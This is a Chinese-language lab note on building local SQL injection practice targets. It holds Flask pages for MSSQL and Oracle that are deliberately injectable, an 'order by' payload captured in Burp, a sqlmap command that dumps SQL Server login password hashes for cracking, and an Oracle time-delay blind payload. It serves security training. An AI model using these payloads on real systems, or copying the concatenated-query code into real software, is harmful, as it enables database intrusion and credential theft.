链接: https://github.com/dhgdhg/DVWA-Note
- windows docker 安装mssql, 搭建测试环境
- https://www.cnblogs.com/edhg/p/11530901.html
- 编写mssql测试网页
import pymssql from flask import Flask, request app = Flask(__name__) @app.route('/') def index(): conn = pymssql.connect(host='127.0.0.1', user='sa', password='Pass@Word1', database='test') cursor = conn.cursor() my_id = request.args.get('id', '') my_sql = "select * from test_t where id=" + my_id + " and name='name1'" result_txt = my_sql + '<br><br><br>' try: cursor.execute(my_sql) row = cursor.fetchone() result_txt += "ID: {}<br>Name: {}".format(row[0], row[1]) except Exception as e: result_txt += str(e) finally: cursor.close() conn.close() return result_txt if __name__ == '__main__': app.run()
- 创建测试表
test_t
, 并添加数据 - sqlmap下载用户名密码表
- burpsuit抓包 并保存为
rr.txt
- 例:
GET /?id=§1%20order%20by%203--+§ HTTP/1.1 Host: 127.0.0.1:5000 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close
- 例:
- 执行sqlmap下载用户名密码数据
sqlmap -r rr.txt --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"
- 使用johnny和字典对数据进行破解
- burpsuit抓包 并保存为
- windows docker 安装oracle, 搭建测试环境
- https://www.cnblogs.com/edhg/p/11531475.html
- 编写oracle测试网页
import cx_Oracle from flask import Flask, request app = Flask(__name__) @app.route('/') def index(): my_id = request.args.get('id', '') # 7369 my_sql = "SELECT * FROM SCOTT.EMP WHERE EMPNO=" + my_id + " and ENAME='SMITH'" result_txt = my_sql + '<br><br><br>' try: dsn = cx_Oracle.makedsn(host='127.0.0.1', port=1521, sid='helowin') conn = cx_Oracle.connect(user='system', password='passwd', dsn=dsn) cursor = conn.cursor() cursor.execute(my_sql) row = cursor.fetchone() result_txt += "ID: {}<br>Name: {}".format(row[0], row[1]) except Exception as e: result_txt += str(e) finally: cursor.close() conn.close() return result_txt if __name__ == '__main__': app.run()
and 1=(DBMS_PIPE.RECEIVE_MESSAGE(1, 10))
- 延时10秒